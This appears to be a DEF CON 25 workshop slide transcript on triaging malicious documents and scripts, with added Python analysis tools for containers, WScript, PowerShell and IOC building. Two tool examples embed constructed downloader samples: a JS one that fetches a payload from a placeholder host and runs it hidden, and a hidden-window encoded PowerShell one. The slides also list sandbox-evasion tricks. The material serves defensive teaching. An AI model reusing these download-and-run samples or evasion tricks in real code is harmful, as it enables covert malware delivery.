Malware Triage - Malscripts Are The New EK - DEF CON 25 Workshops
TRANSCRIPT
Page 1
Malware Triage! Malscripts Are The New Exploit Kit
Page 2
Hello, My Name is:
Sergei Frankoff @herrcore
Sean Wilson @seanmw
Page 3
WARNING! We use real malware and real exploits in the workshops. These have been specifically designed to NOT harm your workstation even if you make a mistake. However, your Anti-Virus and your employer probably don't know the difference. Use your own judgement.
Page 4
What’s the matter, Oracle got you pushing too many pencils?
Using a Virtual Machine is Recommended!
Page 5
Tools You Will Need
Notepad: We recommend Notepad++ or Sublime.
Web Browser: We strongly recommend Chrome (you will need the debugger tools).
Python: Most of the local tools we will use are written in Python.
Internet: Many of the tools we will use are online and require a good Internet connection.
Page 6
OPSEC Warning!
By using online tools you will be sharing data with an unknown third party and in some cases with the entire internet.
Page 7
Malware?
Malware is just code!
Page 8
Malscript?
A malscript is just a script.
Page 9
Malware Analysis Triage
Inputs: Suspicious URL, Suspicious E-mail, Intel feed, Security Event
Questions: Is it malicious? What is the delivery targeting? Do we have exposure?
Page 10
Effective Triage
Triage is effective when malware has been detected in the delivery phase (Lockheed Martin's Intrusion Kill Chain).
Quick way to answer "Do I have exposure?" and "If yes, then what next?"
Page 11
Triage Workflow
Container analysis and extraction
Malscript analysis
Payload identification and download
Payload analysis
Build IOCs
Page 12
The Scenario
tax_return.doc (92 KB)
We are definitely going to take all your money if you don’t open the attached tax returns and fix your mistakes!
Sincerely,
The IRS (or CRA if you live in Canada)
Page 13
Container Analysis
Containers
Document Metadata
Identify Execution Vector
Page 14
Containers: Documents
Page 15
Document Types

| Type | Documents | Extensions | Magic Bytes |
|---|---|---|---|
| OLE Container | Word, PowerPoint, Excel (old format) | .doc .ppt .xls | `D0 CF 11 E0 A1 B1 1A E1` |
| RTF | Rich Text Format (RTF) | .rtf | `7B 5C 72 74 66 31` (`{\rtf1`) |
| ZIP | Word, PowerPoint, Excel (new format) | .docm .docx .pptm .pptx .xlsm .xlsx | `50 4B 03 04` (`PK`) |
| PDF | Portable Document Format (PDF) | .pdf | `25 50 44 46` (`%PDF`) |
Page 17
Documents: Legacy Compound File Binary Format
MetaData: Storage: root; Streams: Summary streams
Macros: Storage: Macros; Files: /Macros/*
Embedded Objects: Storage: ObjectPool; Streams: ole*
Page 21
Documents: RTF
Human-readable text document with markup syntax
Exploits: multiple 1-day exploits
Embedded Objects: Storage: ObjectPool; Streams: ole*
Page 25
Documents: OOXML
MetaData: Path: docProps; Files: core.xml & app.xml
Macros: Path: app-specific (word, xl, ppt); Files: vbaProject.bin & vbaData.bin
Embedded Objects: Path: <app>/embeddings/; Files: oleObject{n}.bin
Page 28
Documents: Code Execution

| Vector | Requires | Relies on | Contains |
|---|---|---|---|
| Macros | User to enable macros | Triggered events (Document_Open, Document_Close) | vbaProject.bin or Macros stream (legacy) |
| Embedded Object | User to activate the object (click) | Default event handler to launch the embedded object | An embedded OLE Packager object |
| Exploit | User to open the document | Unpatched vulnerabilities (CVE-2012-0158) | Shellcode / malformed markup / decoy document |
| PowerPoint CustomActions | User to open the slideshow | Custom Action to activate the embedded object | An embedded OLE Packager object |
Page 29
DO IT LIVE!
Page 30
15 MINUTES
Make sure you have the following tools:
• OleTools
• Notepad
Exercise Steps
• Identify the document type
• Identify the execution vector (exploit, macro, embedded object, etc.)
• Extract executed code
*Bonus
• Use metadata and OSINT tools to identify related variants
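The first two exercise steps above (identify the document type, then the execution vector), as an added Python example that is not part of the workshop's materials: it applies the magic bytes from the Document Types table and then looks for the artefacts the CFB, RTF and OOXML slides name. The .docm it builds in memory is a constructed stand-in, not a real sample, and the UTF-16LE name search for CFB files is a heuristic to be confirmed with oletools.

```python
import io
import re
import zipfile

# Magic bytes from the Document Types table on the slides.
MAGIC = [
    (b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1", "OLE (Compound File Binary)"),
    (b"{\\rtf1", "RTF"),
    (b"PK\x03\x04", "ZIP (OOXML)"),
    (b"%PDF", "PDF"),
]


def identify_container(data: bytes) -> str:
    """Return the container type from the leading bytes, or 'unknown'."""
    for magic, name in MAGIC:
        if data.startswith(magic):
            return name
    return "unknown"


def ooxml_vectors(data: bytes) -> dict:
    """List zip members that are execution-vector artefacts (OOXML slide):
    vbaProject.bin / vbaData.bin for macros, embeddings/oleObject*.bin for
    embedded objects."""
    found = {"macros": [], "embedded_objects": []}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            base = name.rsplit("/", 1)[-1].lower()
            if base in ("vbaproject.bin", "vbadata.bin"):
                found["macros"].append(name)
            elif "/embeddings/" in name.lower() and base.startswith("oleobject"):
                found["embedded_objects"].append(name)
    return found


def cfb_vectors(data: bytes) -> dict:
    """Heuristic for the legacy CFB format: directory entries store storage and
    stream names as UTF-16LE, so a raw search for the names the CFB slide lists
    (Macros, VBA, ObjectPool) is a fast first pass. It is not a real parse:
    the same bytes inside document content would also match, so confirm with
    oletools (oledir / olevba) before acting on it."""
    wanted = {"macros": ["Macros", "VBA"], "embedded_objects": ["ObjectPool"]}
    return {
        key: [n for n in names if n.encode("utf-16-le") in data]
        for key, names in wanted.items()
    }


def triage(data: bytes) -> dict:
    """Combine type identification and execution-vector detection."""
    kind = identify_container(data)
    report = {"type": kind, "macros": [], "embedded_objects": []}
    if kind.startswith("ZIP"):
        report.update(ooxml_vectors(data))
    elif kind.startswith("OLE"):
        report.update(cfb_vectors(data))
    elif kind == "RTF":
        # RTF carries objects as \object groups whose payload is hex-encoded
        # under the \objdata control word; report each occurrence.
        report["embedded_objects"] = [m.decode() for m in re.findall(rb"\\objdata", data)]
    return report


def build_sample_docm() -> bytes:
    """Constructed stand-in for a macro-enabled Word file (not a real sample):
    the zip layout is the real one, the member contents are dummies."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("docProps/core.xml", "<cp:coreProperties/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/vbaProject.bin", b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1" + b"\0" * 24)
        zf.writestr("word/embeddings/oleObject1.bin", b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1")
    return buf.getvalue()


if __name__ == "__main__":
    print(triage(build_sample_docm()))
```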
Page 31
WScript Analysis (JavaScript and VBScript)
Identify Entry Point
Obfuscation
Anti-Analysis
Page 32
Common Script Types

| Type | Extensions | Default Handlers |
|---|---|---|
| JavaScript | .js | WScript.exe or CScript.exe |
| VBScript | .vbs | WScript.exe or CScript.exe |
| WScript | .wsc | notepad.exe |
Page 33
OS Interaction: ActiveX
VBS: CreateObject(…)
JS: ActiveXObject(…)
Methods: Open(…), Send(…), Run(…), ShellExecute(…)
Page 34
Script Based Sandbox Evasion
Environment: number of running processes, user name, recent files, Program Files list, …
Network: ASN details, source IP, ping as time delay
Anti-Analysis: specific functionality (OO vs Microsoft Office objects), obfuscated payloads, payload launch arguments
Page 42
DO IT LIVE!
Page 43
20 MINUTES
Make sure you have the following tools:
• Chrome or IE with debugger console
• Notepad
Exercise Steps
• Identify the script type
• Identify the obfuscation functions and deobfuscate
• Identify the anti-analysis techniques
• Identify and download the payload (how is this executed?)
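A static first pass over a WScript malscript covering the exercise steps above, as an added Python example that is not the workshop's tooling: it sniffs the script type, folds String.fromCharCode() obfuscation back into literals, lists the ActiveX objects and the OS-interaction calls from the ActiveX slide in source order (the entry-point trace), flags the sandbox-evasion markers from the evasion slide, and pulls out URLs as payload candidates. SAMPLE_JS is a constructed, inert script that uses a reserved .invalid hostname, and the PROGIDS mapping is an assumption added here, not something the slides list.

```python
import re

# Assumed mapping of ProgIDs commonly created from malscripts to what they
# give the script; extend it with whatever your own cases turn up.
PROGIDS = {
    "msxml2.xmlhttp": "HTTP client: download",
    "microsoft.xmlhttp": "HTTP client: download",
    "winhttp.winhttprequest.5.1": "HTTP client: download",
    "adodb.stream": "binary stream: write file to disk",
    "scripting.filesystemobject": "filesystem access",
    "wscript.shell": "run commands",
    "shell.application": "ShellExecute",
}
# VBS CreateObject(...) / JS new ActiveXObject(...) with a quoted ProgID.
OBJECT_CREATION = re.compile(
    r"(?:new\s+ActiveXObject|CreateObject|GetObject)\s*\(\s*['\"]([^'\"]+)['\"]", re.I)
# The OS-interaction methods from the ActiveX slide, plus the file-writing ones.
OS_METHODS = re.compile(r"\.(Open|Send|Run|ShellExecute|Exec|SaveToFile|WriteText)\b", re.I)
# Markers for the tricks on the Script Based Sandbox Evasion slide.
ANTI_ANALYSIS = {
    "time delay (WScript.Sleep)": re.compile(r"WScript\.Sleep", re.I),
    "time delay (ping)": re.compile(r"\bping\b[^'\"]*-n\s*\d+", re.I),
    "process count check": re.compile(r"Win32_Process", re.I),
    "user name check": re.compile(r"%USERNAME%|\.UserName\b", re.I),
    "recent files check": re.compile(r"\\Recent\b", re.I),
}
URL_RE = re.compile(r"https?://[^\s'\"<>)]+")


def guess_script_type(src: str) -> str:
    """Rough syntax sniff matching the Common Script Types table."""
    if re.search(r"\bnew\s+ActiveXObject\b|\bvar\b|\bfunction\s*\w*\s*\(", src):
        return "JavaScript"
    if re.search(r"^\s*(Set|Dim)\b|\bCreateObject\s*\(", src, re.M):
        return "VBScript"
    return "unknown"


def deobfuscate_fromcharcode(src: str) -> str:
    """Fold String.fromCharCode(104,116,...) back into a quoted literal."""
    def repl(m):
        codes = [int(x) for x in m.group(1).split(",") if x.strip()]
        return '"' + "".join(chr(c) for c in codes) + '"'
    return re.sub(r"String\.fromCharCode\(\s*([\d\s,]+)\)", repl, src)


def triage_script(src: str) -> dict:
    """Return the entry-point trace (objects created and methods called, in
    source order), the anti-analysis markers and every URL the script references."""
    src = deobfuscate_fromcharcode(src)
    trace, anti = [], []
    for lineno, line in enumerate(src.splitlines(), 1):
        for m in OBJECT_CREATION.finditer(line):
            progid = m.group(1)
            purpose = PROGIDS.get(progid.lower(), "unknown COM object")
            trace.append((lineno, f"create {progid} ({purpose})"))
        for m in OS_METHODS.finditer(line):
            trace.append((lineno, f"call .{m.group(1)}()"))
        for label, rx in ANTI_ANALYSIS.items():
            if rx.search(line):
                anti.append((lineno, label))
    return {"type": guess_script_type(src), "trace": trace, "anti_analysis": anti,
            "urls": sorted(set(URL_RE.findall(src))), "deobfuscated": src}


# Constructed, inert sample in the shape of a .js downloader: the hostname is a
# reserved .invalid name and the "payload" file never exists.
URL = "http://example.invalid/stage.bin"
SAMPLE_JS = (
    'var o = new ActiveXObject("MSXML2.XMLHTTP");\n'
    'var sh = WScript.CreateObject("WScript.Shell");\n'
    "WScript.Sleep(60000);\n"
    "var u = String.fromCharCode(" + ",".join(str(ord(c)) for c in URL) + ");\n"
    'o.open("GET", u, false);\n'
    "o.send();\n"
    'var st = new ActiveXObject("ADODB.Stream");\n'
    'st.SaveToFile("stage.bin", 2);\n'
    'sh.Run("stage.bin", 0);\n'
)

if __name__ == "__main__":
    for key, value in triage_script(SAMPLE_JS).items():
        print(key, value)
```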
Page 44
PowerShell Analysis (PS)
Execution
Obfuscation
Anti-Analysis
Page 51
DO IT LIVE!
Page 52
20 MINUTES
Make sure you have the following tools:
• Python PS decode script
• Notepad
Exercise Steps
• Identify the obfuscation functions and deobfuscate
• Identify the anti-analysis techniques
• Identify and download the payload (how is this executed?)
*Bonus
• Gather as much information from the C2 server as possible
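The "Python PS decode script" the tool list names is not reproduced on the slides; what follows is an added Python example of the same idea, not the workshop's script. It peels a powershell.exe command line layer by layer, decoding -EncodedCommand (base64 of UTF-16LE text) and then any [Convert]::FromBase64String blob (unwrapping Gzip or raw Deflate), and collects the URLs from every layer as payload candidates. The three-layer sample is constructed and inert, and the layering and compression wrappers are assumptions about common obfuscation rather than something the slides show.

```python
import base64
import gzip
import re
import zlib

# powershell.exe -EncodedCommand (and its abbreviations) takes base64 of UTF-16LE text.
ENC_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
# Inline blobs fed to [Convert]::FromBase64String, usually a compressed next stage.
B64_RE = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.I)
URL_RE = re.compile(r"https?://[^\s'\"<>)]+")


def encode_command(text: str) -> str:
    """Inverse of -EncodedCommand decoding; used here only to build the sample."""
    return base64.b64encode(text.encode("utf-16-le")).decode()


def decode_encoded_command(b64: str) -> str:
    """Decode a -EncodedCommand argument to script text."""
    return base64.b64decode(b64).decode("utf-16-le")


def decode_inline_blob(b64: str) -> str:
    """Decode a FromBase64String blob, unwrapping Gzip or raw Deflate if present."""
    raw = base64.b64decode(b64)
    for unpack in (gzip.decompress, lambda b: zlib.decompress(b, -15)):
        try:
            raw = unpack(raw)
            break
        except (OSError, zlib.error):
            continue
    for enc in ("utf-8", "utf-16-le"):
        try:
            return raw.decode(enc)
        except UnicodeDecodeError:
            continue
    return raw.decode("latin-1")


def peel(cmdline: str, max_layers: int = 10) -> list:
    """Return each layer of script text, outermost first, until nothing decodes."""
    layers = [cmdline]
    for _ in range(max_layers):
        current = layers[-1]
        m = ENC_RE.search(current)
        if m:
            layers.append(decode_encoded_command(m.group(1)))
            continue
        m = B64_RE.search(current)
        if m:
            layers.append(decode_inline_blob(m.group(1)))
            continue
        break
    return layers


def extract_urls(layers: list) -> list:
    """Collect every URL seen in any layer: the payload-download candidates."""
    return sorted({u for layer in layers for u in URL_RE.findall(layer)})


# Constructed, inert three-layer sample (example.invalid is a reserved name).
INNER_SCRIPT = "$u = 'http://example.invalid/stage2.bin'; Write-Output $u"


def build_sample_cmdline() -> str:
    """Wrap INNER_SCRIPT in Gzip+base64, then in an -EncodedCommand layer."""
    blob = base64.b64encode(gzip.compress(INNER_SCRIPT.encode())).decode()
    middle = ("$ms = New-Object IO.MemoryStream(,[Convert]::FromBase64String('" + blob + "'));"
              "$gz = New-Object IO.Compression.GzipStream($ms, [IO.Compression.CompressionMode]::Decompress);"
              "$code = (New-Object IO.StreamReader($gz)).ReadToEnd()")
    return "powershell.exe -NonInteractive -WindowStyle Hidden -EncodedCommand " + encode_command(middle)


if __name__ == "__main__":
    for i, layer in enumerate(peel(build_sample_cmdline())):
        print(f"--- layer {i} ---\n{layer[:120]}")
    print("urls:", extract_urls(peel(build_sample_cmdline())))
```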
Page 53
Payload Analysis
VirusTotal
Malwr / Hybrid Analysis
Page 58
Sandbox Magic
(Diagram: the PE runs inside the sandbox and calls the Windows API; the sandbox process monitor records its Network, Filesystem, Registry, Process, Synchronization and Services activity.)
Page 65
DO IT LIVE!
Page 66
20 MINUTES
Make sure you have the following tools:
• https://www.virustotal.com/
• https://malwr.com/
• https://www.hybrid-analysis.com/
Exercise Steps
• Upload the payload to VirusTotal. Has it been identified?
• Upload the payload to Malwr or Hybrid Analysis
• Review the following from the sandbox analysis: mutex created, registry keys created, network traffic
• What is the purpose of the malware?
*Bonus
• Identify a design flaw in the malware that can be used to gather more information from the C2
Page 67
Build IOCs
Identify Pivots
Search for variants
Comparative analysis
Build IOC
Page 68
IOC Formats vs. ... We Don't Teach Formats!
Page 69
The Key is Comparative Analysis
(Diagram: Sample #1 and Sample #2 linked by a shared Pivot (Attribute))
Page 70
Static Attributes
EXIF Data, Compiler Artifacts: easily modified or packed; can make poor indicators
Library and API Imports, Strings: useful for sample discovery; can work as primary indicators
Page 71
Dynamic Attributes
In-Memory Strings
Process Handles / Mutex
Accessed / Created Files
Registry Keys
Network Traffic
Comparative analysis yields more robust IOCs
Page 72
Rough Notes Are OK
Page 73
Mining OSINT
virusshare.com
Page 74
Mining Open Data With OAPivot
Page 75
Acquiring Samples: VirusShare
Page 76
Comparison Checklist

| Attribute | Initial Sample | Pivot Sample A | Pivot Sample B |
|---|---|---|---|
| Strings | | | |
| Exif Data | | | |
| Imphash | | | |
| Memory Strings | | | |
| Mutex | | | |
| File Names | | | |
| Registry Keys | | | |
| Network Traffic | | | |
Page 77
Storing | Consuming | Sharing: MISP
Page 78
MISP: Example
Page 79
CIRCL MISP: Getting Access
Page 80
DO IT LIVE!
Page 81
20 MINUTES
Make sure you have the following tools:
• https://www.virustotal.com/
• https://malwr.com/ (you will need an account to download samples)
• https://www.hybrid-analysis.com/ (you will need an account to download samples)
Exercise Steps
• Using the primary indicators you found from the sandbox run, search for related samples. *Hint: try OAPivot for access to multiple malware search APIs
• Once you have identified related samples, run them in a sandbox and build a checklist of common attributes
• Which attributes do you think would make a good IOC?
*Bonus
• Build a Yara rule and ask the instructors to test it against a *new* variant of the malware
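The Comparison Checklist and the IOC exercise above, as an added Python example that is not part of the workshop's materials: it tabulates attribute values across the initial sample and its pivots, promotes values shared by all samples to IOC candidates while demoting the attributes the Static Attributes slide calls poor indicators, and drafts a YARA rule from the string-like survivors for the bonus task. SAMPLES is constructed data for made-up samples; every mutex, path, key and hostname in it is invented.

```python
from collections import defaultdict

# Rows of the Comparison Checklist. The Static Attributes slide flags EXIF data
# as easily modified, so values from that row are demoted rather than promoted.
ATTRIBUTES = ["strings", "exif", "imphash", "memory_strings", "mutex",
              "file_names", "registry_keys", "network"]
WEAK_ATTRIBUTES = {"exif"}
# Rows whose values can be written straight into a YARA strings section.
YARA_ATTRIBUTES = {"strings", "memory_strings", "mutex", "file_names", "registry_keys", "network"}

RUN_KEY = "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater"
# Constructed checklist data for three made-up samples: none of these are real indicators.
SAMPLES = {
    "initial": {
        "strings": {"Mozilla/4.0 (compatible; MSIE 7.0)", "tax_return"},
        "exif": {"CompanyName=Acme Corp"},
        "imphash": {"imphash-1"},
        "memory_strings": {"/gate.php", "Global\\TaxReturnMutex"},
        "mutex": {"Global\\TaxReturnMutex"},
        "file_names": {"%APPDATA%\\updater.exe"},
        "registry_keys": {RUN_KEY},
        "network": {"POST /gate.php", "c2-one.invalid"},
    },
    "pivot_a": {
        "strings": {"Mozilla/4.0 (compatible; MSIE 7.0)", "invoice"},
        "exif": {"CompanyName=Acme Corp"},
        "imphash": {"imphash-2"},
        "memory_strings": {"/gate.php", "Global\\TaxReturnMutex"},
        "mutex": {"Global\\TaxReturnMutex"},
        "file_names": {"%APPDATA%\\updater.exe"},
        "registry_keys": {RUN_KEY},
        "network": {"POST /gate.php", "c2-two.invalid"},
    },
    "pivot_b": {
        "strings": {"Mozilla/4.0 (compatible; MSIE 7.0)"},
        "exif": {"CompanyName=Acme Corp"},
        "imphash": {"imphash-3"},
        "memory_strings": {"/gate.php", "Global\\TaxReturnMutex"},
        "mutex": {"Global\\TaxReturnMutex"},
        "file_names": {"%TEMP%\\svc.exe"},
        "registry_keys": {"HKCU\\Software\\Acme\\Config"},
        "network": {"POST /gate.php", "c2-three.invalid"},
    },
}


def build_checklist(samples: dict) -> dict:
    """attribute -> value -> set of sample names in which the value was observed."""
    table = defaultdict(lambda: defaultdict(set))
    for sample, attrs in samples.items():
        for attr, values in attrs.items():
            for value in values:
                table[attr][value].add(sample)
    return table


def rank_indicators(samples: dict, min_samples: int = None):
    """Split values seen in at least min_samples samples (default: all of them)
    into robust candidates and weak ones from easily modified attributes."""
    needed = min_samples or len(samples)
    robust, weak = [], []
    for attr, values in build_checklist(samples).items():
        for value, seen in values.items():
            if len(seen) >= needed:
                (weak if attr in WEAK_ATTRIBUTES else robust).append((attr, value))
    return sorted(robust), sorted(weak)


def yara_rule(name: str, robust: list, max_strings: int = 8) -> str:
    """Draft a YARA rule from the robust string-like indicators (the bonus task).
    Memory-only strings need a process-memory scan; test the rule before sharing."""
    strings, seen = [], set()
    for attr, value in robust:
        if attr in YARA_ATTRIBUTES and value not in seen:
            strings.append(value)
            seen.add(value)
    strings = strings[:max_strings]
    lines = [f"rule {name}", "{", "    strings:"]
    for i, s in enumerate(strings):
        esc = s.replace("\\", "\\\\").replace('"', '\\"')
        lines.append(f'        $s{i} = "{esc}" ascii wide')
    lines += ["    condition:",
              f"        {min(2, len(strings))} of them" if strings else "        false", "}"]
    return "\n".join(lines)


if __name__ == "__main__":
    robust, weak = rank_indicators(SAMPLES)
    print("robust:", robust)
    print("weak:", weak)
    print(yara_rule("tax_return_family", robust))
```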
Page 82
Thank you and remember…
Upload samples.
Leave comments.
Join a trust group.
Blog your analysis.
Close the feedback loop
Page 83
Image Attribution
• Email designed by Henrique Sales from the Noun Project
• Browser designed by Kwesi Phillips from the Noun Project
• Handshake designed by DEADTYPE from the Noun Project
• Gears designed by Rebecca Walthall from the Noun Project
• Magnifying Glass designed by Edward Boatman from the Noun Project
• Warning designed by Melissa Holterman from the Noun Project
• Plus designed by Alex S. Lakas from the Noun Project
• Notepad designed by Lemon Liu from the Noun Project
• Browser designed by Adriano Emerick from the Noun Project
• "Bill O'reilly Flips Out (Do it Live!!!!!11) [DiscoTech RMX]", http://www.youtube.com/user/morevidznow/about
• No designed by Alex Dee from the Noun Project
• Sad designed by Brian Dys Sahagun from the Noun Project
• Surveillance designed by Luis Prado from the Noun Project
• Download designed by Jonathan Searfoss from the Noun Project
• Analysis designed by Christopher Holm-Hansen from the Noun Project
• Js File designed by useiconic.com from the Noun Project
• Bug designed by Matt Crum from the Noun Project
• coding by Chameleon Design from the Noun Project
• Box by Esteban Gramajo from the Noun Project